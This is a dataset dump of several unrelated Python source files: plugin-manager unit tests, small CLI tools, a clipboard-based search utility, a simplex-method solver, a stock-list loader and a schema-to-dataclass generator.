plugin.load_plugin()
plugin.load_plugin()
entry_point.load.assert_called_once_with()
def test_load_plugin_catches_and_reraises_exceptions():
"""Verify we raise our own FailedToLoadPlugin."""
entry_point = mock.Mock(spec=['load'])
entry_point.load.side_effect = ValueError('Test failure')
plugin = manager.Plugin('T000', entry_point)
with pytest.raises(exceptions.FailedToLoadPlugin):
plugin.load_plugin()
def test_load_noncallable_plugin():
"""Verify that we do not load a non-callable plugin."""
entry_point = mock.Mock(spec=['load'])
entry_point.load.return_value = mock.NonCallableMock()
plugin = manager.Plugin('T000', entry_point)
with pytest.raises(exceptions.FailedToLoadPlugin):
plugin.load_plugin()
entry_point.load.assert_called_once_with()
def test_plugin_property_loads_plugin_on_first_use():
"""Verify that we load our plugin when we first try to use it."""
entry_point = mock.Mock(spec=['load'])
plugin = manager.Plugin('T000', entry_point)
assert plugin.plugin is not None
entry_point.load.assert_called_once_with()
def test_execute_calls_plugin_with_passed_arguments():
"""Verify that we pass arguments directly to the plugin."""
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock()
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
plugin.execute('arg1', 'arg2', kwarg1='value1', kwarg2='value2')
plugin_obj.assert_called_once_with(
'arg1', 'arg2', kwarg1='value1', kwarg2='value2'
)
# Extra assertions
assert entry_point.load.called is False
def test_version_proxies_to_the_plugin():
"""Verify that we pass arguments directly to the plugin."""
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['version'])
plugin_obj.version = 'a.b.c'
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
assert plugin.version == 'a.b.c'
def test_register_options():
"""Verify we call add_options on the plugin only if it exists."""
# Set up our mocks and Plugin object
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['name', 'version', 'add_options',
'parse_options'])
option_manager = mock.MagicMock(spec=options_manager.OptionManager)
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
# Call the method we're testing.
plugin.register_options(option_manager)
# Assert that we call add_options
plugin_obj.add_options.assert_called_once_with(option_manager)
def test_register_options_checks_plugin_for_method():
"""Verify we call add_options on the plugin only if it exists."""
# Set up our mocks and Plugin object
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['name', 'version', 'parse_options'])
option_manager = mock.Mock(spec=['register_plugin'])
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
# Call the method we're testing.
plugin.register_options(option_manager)
# Assert that we register the plugin
assert option_manager.register_plugin.called is False
def test_provide_options():
"""Verify we call add_options on the plugin only if it exists."""
# Set up our mocks and Plugin object
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['name', 'version', 'add_options',
'parse_options'])
option_values = argparse.Namespace(enable_extensions=[])
option_manager = mock.Mock()
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
# Call the method we're testing.
plugin.provide_options(option_manager, option_values, None)
# Assert that we call add_options
plugin_obj.parse_options.assert_called_once_with(
option_manager, option_values, None
)
@pytest.mark.parametrize('ignore_list, code, expected_list', [
(['E', 'W', 'F', 'C9'], 'W', ['E', 'F', 'C9']),
(['E', 'W', 'F'], 'C9', ['E', 'W', 'F']),
])
def test_enable(ignore_list, code, expected_list):
"""Verify that enabling a plugin removes it from the ignore list."""
options = mock.Mock(ignore=ignore_list)
optmanager = mock.Mock()
plugin = manager.Plugin(code, mock.Mock())
plugin.enable(optmanager, options)
assert options.ignore == expected_list
def test_enable_without_providing_parsed_options():
"""Verify that enabling a plugin removes it from the ignore list."""
optmanager = mock.Mock()
plugin = manager.Plugin('U4', mock.Mock())
plugin.enable(optmanager)
optmanager.remove_from_default_ignore.assert_called_once_with(['U4'])
```
|
{
"source": "jeertmans/iunctus",
"score": 2
}
|
#### File: iunctus/cli/add.py
```python
import click
import re
import os
import collections
from iunctus.utils.files import find, filter_file
def preview_files(files, statuses):
if len(files) < 1:
click.echo("No file to preview")
return
colors = ["green", "red", "bright_black"]
messages = ["", " (OVERWRITE)", " (IGNORE)"]
lines = "\n".join(
click.style(file + messages[status], fg=colors[status])
for file, status in zip(files, statuses)
)
C = collections.Counter(statuses)
C0 = C[0]
C1 = C[1]
C2 = C[2]
lines += f"\n\n{len(files)} files: {C0} new, {C1} overwritten and {C2} ignored."
click.echo(lines)
@click.command()
@click.pass_context
@click.argument("path", type=click.Path(exists=True), required=False)
@click.option(
"-p",
"--pattern",
type=str,
multiple=True,
help="REGEX pattern(s) that images files must match.",
)
@click.option(
"-r",
"--recursive",
is_flag=True,
default=False,
help="Search recursively in PATH (default: FALSE).",
)
@click.option(
"-w",
"--preview",
is_flag=True,
default=False,
help="Preview list of images to add and exit.",
)
@click.option(
"-a",
"--any_pattern",
is_flag=True,
default=False,
help="Image paths must match ANY pattern (default: ALL).",
)
@click.option(
"-o",
"--overwrite",
is_flag=True,
default=False,
help="Overwrite image data files when duplicates.",
)
def add(ctxt, path, pattern, recursive, preview, any_pattern, overwrite):
"""
Add image files to the current iunctus project.
"""
if not path:
path = "."
print(dir(ctxt))
print(ctxt.parent.params)
patterns = [re.compile(p) for p in pattern]
files = find(path, recursive)
files = filter(lambda file: filter_file(file, patterns, any_pattern), files)
if preview:
files = list(files)
preview_files(files, [2 for _ in files])
```
|
{
"source": "jeertmans/RayTracingInOneWeekend",
"score": 2
}
|
#### File: RayTracingInOneWeekend/rtionewe/cli.py
```python
import click
@click.group(invoke_without_command=True)
@click.option("-W", "--width", default=256, type=int, help="Image width.")
@click.option("-H", "--height", default=256, type=int, help="Image height.")
@click.option("-S", "--size", default=None, type=int, help="Image size.")
@click.option(
"-o",
"--output",
default="out.png",
type=click.Path(dir_okay=False),
help="Output image file.",
)
@click.pass_context
def cli(ctx, width, height, size, output):
if ctx.invoked_subcommand is not None:
return
if size is not None:
width = height = size
from .images import Image
from .scenes import example_scene
from .vectors import ray_color, vector
import numpy as np
array = example_scene(width=width, height=height)
image = Image.from_scene_array(array)
image.save(output)
@cli.command()
def clear_cache():
import os
import shutil
dirname = os.path.dirname(__file__)
shutil.rmtree(os.path.join(dirname, "__pycache__"))
click.secho("Cache folder was cleared!", fg="green")
if __name__ == "__main__":
cli()
```
|
{
"source": "jeertmans/selsearch",
"score": 2
}
|
#### File: selsearch/selsearch/main.py
```python
from .search import search_text
from .selection import get_selected_text
def search_selected_text(where=None):
text = get_selected_text()
search_text(where, text)
```
#### File: selsearch/selsearch/search.py
```python
import urllib.parse
import webbrowser
def search_text(where, text):
urlsafe = urllib.parse.quote(text)
browser = webbrowser.get()
browser.open(f"{where}{urlsafe}")
```
#### File: selsearch/selsearch/selection.py
```python
import os
import platform
import shutil
import time
import pyperclip
from pynput.keyboard import Controller, Key
from .config import get_config
keyboard = Controller()
def get_selected_text_xsel():
return os.popen("xsel").read()
def get_selected_text_alt():
clipboard = pyperclip.paste()
keyboard.release(Key.alt)
with keyboard.pressed(Key.ctrl):
keyboard.press("c")
time.sleep(0.1)
keyboard.release("c")
time.sleep(0.1)
text = pyperclip.paste()
pyperclip.copy(clipboard)
return text
def get_selected_text_mac():
clipboard = pyperclip.paste()
keyboard.release(Key.alt)
with keyboard.pressed(Key.cmd):
keyboard.press("c")
time.sleep(0.1)
keyboard.release("c")
time.sleep(0.1)
text = pyperclip.paste()
pyperclip.copy(clipboard)
return text
config = get_config()
xsel = config["defaults"].getboolean("xsel", False)
if xsel and shutil.which("xsel"):
get_selected_text = get_selected_text_xsel
elif platform.system() == "Darwin":
get_selected_text = get_selected_text_mac
else:
get_selected_text = get_selected_text_alt
```
|
{
"source": "jeespoping/metodo_simplex",
"score": 4
}
|
#### File: build/Ejecutable Simplex/Matriz_sig.py
```python
from fractions import Fraction
class Matriz:
def __init__(self,matriz,pivote):
self.matriz = matriz
self.pivotec = pivote[0]
self.pivotef = pivote[1]
self.pivote = matriz[pivote[1]][pivote[0]]
def filasale(self):
for i in range(2):
self.matriz[self.pivotef][i] = self.matriz[i][self.pivotec]
if self.pivote!=1:
print("------filae-----------------")
for i in range(2,len(self.matriz[0])):
print(self.matriz[self.pivotef][i],self.pivote)
self.matriz[self.pivotef][i] = Fraction(self.matriz[self.pivotef][i],self.pivote)
def demasfilas(self):
for i in range(2,len(self.matriz)-2):
aux = self.matriz[i][self.pivotec]
if(i!=self.pivotef):
for j in range(2,len(self.matriz[0])):
self.matriz[i][j] = self.matriz[i][j] - (aux*self.matriz[self.pivotef][j])
def solucion(self):
fila = len(self.matriz)-2
suma = 0
for i in range(2,len(self.matriz[0])):
for j in range(2,fila):
suma += self.matriz[j][0]*self.matriz[j][i]
self.matriz[fila][i] = suma
suma = 0
def cj(self):
fila = len(self.matriz) - 1
for i in range(3,len(self.matriz[0])):
self.matriz[fila][i] = self.matriz[0][i]-self.matriz[fila-1][i]
def convinar(self):
self.filasale()
self.demasfilas()
self.solucion()
self.cj()
return self.matriz
```
#### File: build/Ejecutable Simplex/Tabla.py
```python
import sympy
class Tabla:
def __init__(self,funcion,variables,restricciones,desig,result):
self.funcion = funcion
self.variables = variables
self.restricciones = restricciones
self.desig = desig
self.result = result
self.matriz = []
def matrizlol(self):
cont = 0
M = sympy.symbols('M')
fila1 = []
fila2 = []
fila3 = []
fila1.append("")
fila1.append("Cj")
fila1.append("")
fila2.append("Cb")
fila2.append("VS")
fila2.append("Sol")
for i in range(len(self.variables)):
fila1.append(int(self.variables[i]))
fila2.append("X%d" % (i + 1))
for i in range(len(self.desig)):
if self.desig[i] == "≤":
fila1.append(0)
fila2.append("S%d" % (i + 1))
elif self.desig[i] == "≥":
fila1.append(0)
fila2.append("S%d" % (i + 1))
cont += 1
else:
cont += 1
for i in range(cont):
if(self.funcion == "Min z"):
fila1.append(M)
else: fila1.append(M*-1)
fila2.append("A%d" % (i + 1))
self.matriz.append(fila1)
self.matriz.append(fila2)
cont = 0
auxva = 0
auxvari = ""
auxA = ""
for i in range(len(self.desig)):
if self.desig[i] == "≤":
auxvari = "S%d" % (i+1)
auxva = 1
fila3.append(0)
fila3.append(auxvari)
elif self.desig[i] == "≥":
auxvari = "S%d" % (i+1)
auxva = -1
auxA = "A%d"%(cont+1)
if (self.funcion == "Min z"):
fila3.append(M)
else:
fila3.append(M * -1)
fila3.append(auxA)
cont += 1
else:
if (self.funcion == "Min z"):
fila3.append(M)
else:
fila3.append(M * -1)
fila3.append("A%d" % (cont + 1))
auxA = "A%d" % (cont + 1)
cont += 1
fila3.append(int(self.result[i]))
for j in range(len(fila2)-3):
if(fila2[j+3][0] == "X"):
fila3.append(int(self.restricciones[i][j]))
elif(fila2[j+3] == auxvari):
fila3.append(auxva)
elif(fila2[j+3] == auxA):
fila3.append(1)
else: fila3.append(0)
auxva = 0
auxvari = ""
auxA = ""
self.matriz.append(fila3.copy())
fila3 = []
self.solucion(M)
self.cj(M)
return self.matriz
def solucion(self,M):
fila4 = []
sum = 0
fila4.append("")
fila4.append("Zj")
for i in range(len(self.matriz[0])-2):
for j in range(len(self.result)):
sum += self.matriz[j+2][0] * self.matriz[j+2][i+2]
fila4.append(sum)
sum=0
self.matriz.append(fila4)
def cj(self,M):
fila5 = []
fila5.append("")
fila5.append("Cj-Zj")
fila5.append("")
for i in range(len(self.matriz[0]) - 3):
fila5.append(self.matriz[0][i+3]-self.matriz[len(self.matriz)-1][i+3])
self.matriz.append(fila5)
```
|
{
"source": "JeesubKim/stocker",
"score": 3
}
|
#### File: src/monitor/item.py
```python
import threading
from util.pandas import read_html
from db.dbms import DBMS
KOREA_EXCHANGE_URL = 'http://kind.krx.co.kr/corpgeneral/corpList.do?method=download' #한국거래소 KRX URL
COLUMNS = ['회사명','종목코드','업종','주요제품','지역']
COLUMNS_IN_DB = ['name', 'code', 'category', 'product', 'location']
TABLE = 'stock_item'
class StockItem(threading.Thread):
def __init__(self):
super().__init__()
self.db = DBMS()
def run(self):
print('run StockItem')
# 1. retrieve market list from KRX and read tables from html
market_list = read_html(KOREA_EXCHANGE_URL,0,0)
# 2. filter columns with pre-defined list
print(type(market_list))
filtered_list = market_list[COLUMNS]
# 3. insert into database , table : stock_item
for idx in filtered_list.index:
data = dict.fromkeys(COLUMNS_IN_DB)
for col_idx, col in enumerate(COLUMNS_IN_DB):
data[col] = str(filtered_list.iloc[idx][COLUMNS[col_idx]])
code = data['code']
data['code'] = f'00000{code}'[-6:]
self.db.insert(TABLE, data)
# self.db.upsert(TABLE, data)
```
|
{
"source": "Jeet1243/Mathematizer",
"score": 3
}
|
#### File: Jeet1243/Mathematizer/fibonacci.py
```python
brightness_4
# Function for nth Fibonacci number
def Fibonacci(n):
if n<=0:
print("Incorrect input")
# First Fibonacci number is 0
elif n==1:
return 0
# Second Fibonacci number is 1
elif n==2:
return 1
else:
return Fibonacci(n-1)+Fibonacci(n-2)
# Driver Program
print(Fibonacci(9))
#This code is contributed by <NAME>
```
#### File: Jeet1243/Mathematizer/turtle.py
```python
import random
import turtle
# function to check whether turtle
# is in Screen or not
def isInScreen(win, turt):
# getting the end points of turtle screen
leftBound = -win.window_width() / 2
rightBound = win.window_width() / 2
topBound = win.window_height() / 2
bottomBound = -win.window_height() / 2
# getting the cuurent position of the turtle
turtleX = turt.xcor()
turtleY = turt.ycor()
# variable to store whether in screen or not
stillIn = True
# condition to check whether in screen or not
if turtleX > rightBound or turtleX < leftBound:
stillIn = False
if turtleY > topBound or turtleY < bottomBound:
stillIn = False
# returning the result
return stillIn
# function to check whether both turtle have
# different position or not
def sameposition(Red, Blue):
if Red.pos() == Blue.pos():
return False
else:
return True
# main function
def main():
# screen initialization for turtle
wn = turtle.Screen()
# Turtle Red initialization
# instantiate a new turtle object
# called 'Red'
Red = turtle.Turtle()
# set pencolor as red
Red.pencolor("red")
# set pensize as 5
Red.pensize(5)
# set turtleshape as turtle
Red.shape('turtle')
pos = Red.pos()
# Turtle Blue initialization
# instantiate a new turtle object
# called 'Blue'
Blue = turtle.Turtle()
# set pencolor as blue
Blue.pencolor("blue")
# set pensize as 5
Blue.pensize(5)
# set turtleshape as turtle
Blue.shape('turtle')
# make the turtle invisible
Blue.hideturtle()
# don't draw when turtle moves
Blue.penup()
# move the turtle to a location 50
# units away from Red
Blue.goto(pos[0]+50, pos[1])
# make the turtle visible
Blue.showturtle()
# draw when the turtle moves
Blue.pendown()
# variable to store whether turtles
# are in screen or not
mT = True
jT = True
# loop for the game
while mT and jT and sameposition(Red, Blue):
# coin flip for Red
coinRed = random.randrange(0, 2)
# angle for Red
# random.randrange(0, 180)
angleRed = 90
# condition for left or ight
# based on coin
if coinRed == 0:
Red.left(angleRed)
else:
Red.right(angleRed)
# coin flip for Blue
coinBlue = random.randrange(0, 2)
# angle for Blue
# random.randrange(0, 180)
angleBlue = 90
# condition for left or ight based
# on coin
if coinBlue == 0:
Blue.left(angleBlue)
else:
Blue.right(angleBlue)
# draw for Red
Red.forward(50)
# draw for Blue
Blue.forward(50)
# cheking whether turtles are in the
# screen or not
mT = isInScreen(wn, Blue)
jT = isInScreen(wn, Red)
# set pencolor for Blue and Red as black
Red.pencolor("black")
Blue.pencolor("black")
# condion check for draw or win
if jT == True and mT == False:
# writting results
Red.write("Red Won", True, align="center",
font=("arial", 15, "bold"))
elif mT == True and jT == False:
# writting results
Blue.write("Blue Won", True, align="center",
font=("arial", 15, "bold"))
else:
# writting results
Red.write("Draw", True, align="center",
font=("arial", 15, "bold"))
Blue.write("Draw", True, align="center",
font=("arial", 15, "bold"))
# exit on close
wn.exitonclick()
# Calling main function
main()
```
|
{
"source": "jeet777/PyOcpp",
"score": 3
}
|
#### File: PyOcpp/scripts/schema_to_dataclass.py
```python
import sys
import re
import json
from pathlib import Path
map_schema_type_to_python = {
"object": "Dict",
"array": "List",
"integer": "int",
"string": "str",
"number": "int",
"boolean": "bool",
"any": "Any",
}
def create_dataclass(name):
return dataclass(name)
def create_attribute(name, type, required):
name = re.sub('([a-z0-9])([A-Z])', r'\1_\2', name).lower()
type = map_schema_type_to_python[type]
return attribute(name, type, required)
class dataclass:
def __init__(self, name):
self.name = name
self.attrs = []
def add_attr(self, attr):
self.attrs.append(attr)
def __str__(self):
output = f"@dataclass\nclass {self.name}Payload:\n"
if len(self.attrs) == 0:
return output + " pass\n"
optional_attrs = ""
for attr in self.attrs:
if attr.required:
output += str(attr)
else:
optional_attrs += str(attr)
return output + optional_attrs
class attribute:
def __init__(self, name, type, required):
self.name = name
self.type = type
self.required = required
def __str__(self):
name = self.name
if not re.match("^[a-zA-Z_]", self.name):
name = "_" + self.name
definition = f" {name}: {self.type}"
if self.required is True:
# if self.type == "Dict":
# definition += " = field(default_factory=dict)\n"
# elif self.type == "List":
# definition += " = field(default_factory=list)\n"
# else:
definition += "\n"
else:
definition += " = None\n"
return definition
def __repr__(self):
return f"<{self.name}, {self.type}, {self.required}> "
calls = []
call_results = []
def parse_schema(schema):
with open(schema, "r") as f:
schema = json.loads(f.read())
name = schema['$id'].split(":")[-1]
call = False
call_result = False
if name.endswith("Request"):
call = True
elif name.endswith("Response"):
call_result = True
dc = create_dataclass(name)
try:
properties = schema['properties']
except KeyError:
if call:
calls.append(dc)
elif call_result:
call_results.append(dc)
return
for property, definition in properties.items():
if property == "customData":
continue
required = True
try:
required = property in schema['required']
except KeyError:
required = False
try:
type = definition['type']
except KeyError:
try:
ref = definition['$ref'].split('/')[-1]
type = schema['definitions'][ref]['type']
except KeyError:
if definition == {}:
type = "any"
attr = create_attribute(property, type, required)
dc.add_attr(attr)
if call:
calls.append(dc)
elif call_result:
call_results.append(dc)
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Pass path to folder with schemas")
sys.exit(-1)
p = Path(sys.argv[1])
schemas = list(p.glob("*.json"))
for schema in schemas:
parse_schema(schema)
with open('call.py', 'wb+') as f:
f.write(b"from typing import Any, Dict, List\n")
f.write(b"from dataclasses import dataclass, field, Optional")
for call in sorted(calls, key=lambda call: call.name):
f.write(b"\n\n")
f.write(str(call).encode('utf-8'))
with open('call_result.py', 'wb+') as f:
f.write(b"from typing import Any, Dict, List\n")
f.write(b"from dataclasses import dataclass, field")
for call in sorted(call_results, key=lambda call: call.name):
f.write(b"\n\n")
f.write(str(call).encode('utf-8'))
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.